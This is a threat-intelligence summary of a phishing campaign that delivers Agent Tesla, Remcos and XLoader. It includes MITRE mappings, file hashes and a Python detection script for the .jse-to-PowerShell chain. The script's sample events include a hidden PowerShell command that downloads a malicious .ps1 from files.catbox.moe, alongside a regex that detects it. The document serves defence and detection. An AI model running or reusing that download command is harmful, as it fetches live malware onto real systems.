This article describes a multi-layered attack chain discovered in December 2024 that delivers malware including Agent Tesla variants, Remcos RAT, and XLoader. The attackers use phishing emails with deceptive attachments to bypass security measures, relying on AutoIt and PowerShell for malware delivery and execution. Despite the sophistication of the chain, advanced detection systems such as Palo Alto Networks' Advanced WildFire counter these threats effectively. Affected: malware delivery, phishing, cybersecurity
Key points:
- An attack chain using multi-layered stages to deliver various malware types was uncovered.
- Phishing emails disguised as order requests were used to deliver malicious attachments.
- The campaign utilized AutoIt and PowerShell for executing the malware.
- Malicious files contained script-based malware and were designed to evade detection.
- Palo Alto Networks' Advanced WildFire effectively detected and mitigated these attacks.
- Two primary types of payloads were deployed: .NET and AutoIt compiled executables.
- Detailed analysis of the AutoIt scripts and the debugging methods used to unpack them was explored in the article.
- The packaged malware was built for both resilience against analysis and simplicity of execution.
- Detection tools by Palo Alto Networks aid in identifying threats from known domains associated with the attack.
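The chain summarized above (a .7z attachment carrying a .jse script that invokes PowerShell to fetch a .ps1 stage from files.catbox.moe) can be spotted in process-creation telemetry. The following is an added detection example, not code from the original article or from Palo Alto Networks; the event records are constructed Sysmon-style samples, and the field layout, pids and local paths are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
# Tuple layout (assumed): (pid, parent pid, image path, command line).
EVENTS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Program Files\7-Zip\7zFM.exe",
     r'7zFM.exe "C:\Users\u\Downloads\doc00290320092.7z"'),
    (300, 200, r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\u\AppData\Local\Temp\doc00290320092.jse"'),
    (400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -w hidden -c "iwr https://files.catbox.moe/rv94w8.ps1 -OutFile s.ps1"'),
    # Benign PowerShell launched by the user's shell: same image, different parent and URL.
    (500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe Get-Process"),
]

# Windows script hosts that interpret .jse files by default.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Stage-2 fetch pattern taken from the IoC list on this page (files.catbox.moe/<id>.ps1).
STAGE2_URL = re.compile(r"files\.catbox\.moe/\S+\.ps1", re.IGNORECASE)


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_chain_hits(events):
    """Return pids of powershell.exe processes whose parent is a script host
    running a .jse file and whose command line fetches a .ps1 from files.catbox.moe.
    Both conditions must hold, so a lone PowerShell or a lone .jse does not fire."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    hits = []
    for pid, (ppid, image, cmd) in by_pid.items():
        if image_name(image) != "powershell.exe":
            continue
        parent = by_pid.get(ppid)
        if parent is None:
            continue
        _, pimage, pcmd = parent
        parent_runs_jse = image_name(pimage) in SCRIPT_HOSTS and ".jse" in pcmd.lower()
        if parent_runs_jse and STAGE2_URL.search(cmd):
            hits.append(pid)
    return hits


if __name__ == "__main__":
    print("suspicious powershell pids:", find_chain_hits(EVENTS))  # [400]
```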
MITRE Techniques:
- T1071.001: Application Layer Protocol - PowerShell used to execute next-stage payloads.
- T1059.001: Command and Scripting Interpreter: PowerShell - Utilized for downloading and executing malware.
- T1203: Exploitation for Client Execution - Delivery via phishing emails with malicious attachments.
- T1041: Exfiltration Over Command and Control Channel - Malware retrieves necessary payloads from remote servers.
- T1064: Scripting - The use of AutoIt scripts for final malware payload execution and injection into processes.
Indicators of Compromise:
- [SHA-256] 00dda3183f4cf850a07f31c776d306438b7ea408e7fb0fc2f3bdd6866e362ac5 - doc00290320092.7z
- [SHA-256] f4625b34ba131cafe5ac4081d3f1477838afc16fedc384aea4b785832bcdbfdd - doc00290320092.jse
- [SHA-256] d616aa11ee05d48bb085be1c9bad938a83524e1d40b3f111fa2696924ac004b2 - files.catbox[.]moe/rv94w8[.]ps1
- [SHA-256] 550f191396c9c2cbf09784f60faab836d4d1796c39d053d0a379afaca05f8ee8 - AutoIt compiled EXE for Agent Tesla variant
- [SHA-256] 61466657b14313134049e0c6215266ac1bb1d4aa3c07894f369848b939692c49 - doc00290320092.7z
Full Story: https://unit42.paloaltonetworks.com/phishing-campaign-with-complex-attack-chain/